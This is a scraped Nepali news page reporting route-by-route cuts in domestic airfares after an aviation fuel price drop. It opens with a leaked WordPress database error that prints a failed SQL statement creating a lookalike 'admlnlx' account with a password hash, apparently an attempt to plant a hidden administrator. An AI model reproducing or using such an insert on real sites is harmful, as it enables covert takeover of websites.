WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Ba0WbfvMebv1d/xUqKuZygEthdmdDq/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-09 04:45:18', '', 'admlnlx', 'admlnlx')
चितवन,मंसिर २२-
हवाई इन्धनमा प्रतिलिटर रु आठले कमी आएपछि विभिन्न गन्तव्यमा आन्तरिक उडानको हवाई भाडादर समायोजन गरिएको छ ।बुधबारदेखि लागू हुने गरी गरिएको समायोजनअनुसार नयाँ हवाई भाडामा न्यूनतम ३५ रुपैयाँदेखि ३ सय १० रुपैयाँ सम्म घटाएको हवाई सेवा सञ्चालक एसोसिएसनले जनाएको छ ।
काठमाडौँ–माउन्टेन उडानको भाडामा ३ सय रुपैयाँले घटेको छ। एसोसिएसनका अनुसार काठमाडौँ–भरतपुरको भाडामा एक सय पाँच रुपैयाँले घटेको छ। काठमाडौँ–पोखराको भाडामा १ सय ३५ रुपैयाँ, काठमाडौँ–विराटनगरको भाडामा १ सय ८५ रुपैयाँ, काठमाडौँ–जनकपुरको भाडामा १ सय २० रुपैयाँ र काठमाडौँ–भैरहवाको भाडामा १ सय ६५रुपैयाँले घटेको एसोसिएसनले जनाएको छ।
एसोसिएसनका अनुसार काठमाडौँ–धनगढी ३ सय १० रुपैयाँ, काठमाडौँ–नेपालगञ्ज २ सय ३५ रुपैयाँ, काठमाडौँ–भद्रपुर २ सय २० रुपैयाँ, काठमाडौँ–तुम्लीङ्टार १ सय ६५ रुपैयाँ, काठमाडौँ–सिमरा ९० रुपैयाँ र विराटनगर–तुम्लिङ्टारको एक सय रुपैयाँ भाडा घटेको छ।
आन्तरिक उडानतर्फ नै सबैभन्दा कम ३५ रुपैयाँले डोटी–साँफेबगरको भाडा घटेको छ। पोखरा–जोमसोम ६५ रुपैयाँ र काठमाडौँ–लुक्ला १ सय १० रुपैयाँले भाडामा घटेको एसोसिएसनले जनाएको छ।